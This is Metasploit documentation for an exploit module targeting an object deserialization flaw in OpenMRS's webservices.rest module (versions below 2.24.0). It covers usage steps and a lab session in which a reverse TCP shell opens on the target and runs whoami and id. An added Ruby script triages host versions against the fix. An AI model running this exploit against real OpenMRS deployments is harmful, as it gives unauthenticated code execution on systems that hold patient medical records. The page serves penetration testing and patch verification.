metasploit-gs/documentation/modules/exploit/multi/http/openmrs_deserialization.md
Shelby Pace 407adca9ec add docs
2019-11-21 14:15:57 -06:00


Vulnerable Application

OpenMRS is an open-source platform that supplies users with a customizable medical record system.

There exists an object deserialization vulnerability in the webservices.rest module used in OpenMRS Platform for versions below v2.24.0. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as /ws/rest/v1/concept.

Vulnerable versions of the software can be found here.

Tested on OpenMRS Platform v2.1.2 and v2.21 with Java 8 and Java 9.
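As an added defender-side example (not code from this module or from OpenMRS), the triage script below encodes the fix boundary stated above (fixed in 2.24.0) so an inventory of OpenMRS hosts can be sorted into patched and unpatched. The hostnames and versions in the inventory are constructed, and the check-output parser assumes the line shape shown in the Scenarios session.

```ruby
# Added example (not part of the Metasploit module or OpenMRS): triage OpenMRS
# Platform versions against the fix boundary named on this page (fixed in 2.24.0).
FIXED_VERSION = '2.24.0'.freeze

# Split a dotted version into integer components so "2.9" sorts below "2.24";
# a plain string comparison would order those the wrong way round.
def version_components(version)
  version.to_s.strip.sub(/\Av/i, '').split('.').map { |part| Integer(part[/\d+/] || 0) }
end

# Compare two dotted versions; the shorter one is padded with zeros,
# so "2.21" and "2.21.0" compare equal.
def compare_versions(a, b)
  left = version_components(a)
  right = version_components(b)
  width = [left.length, right.length].max
  left += [0] * (width - left.length)
  right += [0] * (width - right.length)
  left <=> right
end

# A version is in the vulnerable range when it sorts below the fixed release.
def vulnerable_version?(version)
  compare_versions(version, FIXED_VERSION) < 0
end

# Pull the version out of a line shaped like the module's check output, e.g.
# "[*] 10.0.0.5:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2"
def version_from_check_output(line)
  line[/OpenMRS platform version:\s*([0-9][0-9.]*)/, 1]
end

# Constructed inventory for a patch review (placeholder hostnames, not real systems).
INVENTORY = {
  'emr-app-01.example' => '2.1.2',
  'emr-app-02.example' => '2.21',
  'emr-app-03.example' => '2.9.0',
  'emr-app-04.example' => '2.24.0'
}.freeze

# Hosts still running a version below the fixed release, sorted by name.
def hosts_needing_upgrade(inventory = INVENTORY)
  inventory.select { |_host, version| vulnerable_version?(version) }.keys.sort
end

if __FILE__ == $PROGRAM_NAME
  puts "Needs upgrade to #{FIXED_VERSION} or later: #{hosts_needing_upgrade.join(', ')}"
end
```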

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/openmrs_deserialization
  4. Do: set TARGETURI <uri>
  5. Do: set RHOSTS <ip>
  6. Do: run
  7. You should get a shell.

Options

ForceExploit

Overrides the check result and runs the exploit.

Scenarios

Version of software and OS as applicable

msf5 > use exploit/multi/http/openmrs_deserialization 
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
rhosts => 192.168.37.168
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
targeturi => /openmrs-standalone
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/openmrs_deserialization) > check
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
msf5 exploit(multi/http/openmrs_deserialization) > run

[*] Started reverse TCP double handler on 192.168.37.1:4444 
[*] Target is running OpenMRS
[*] Formatting payload
[*] Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wKYK4x9ZOHJ37tm7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

whoami
space
id
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)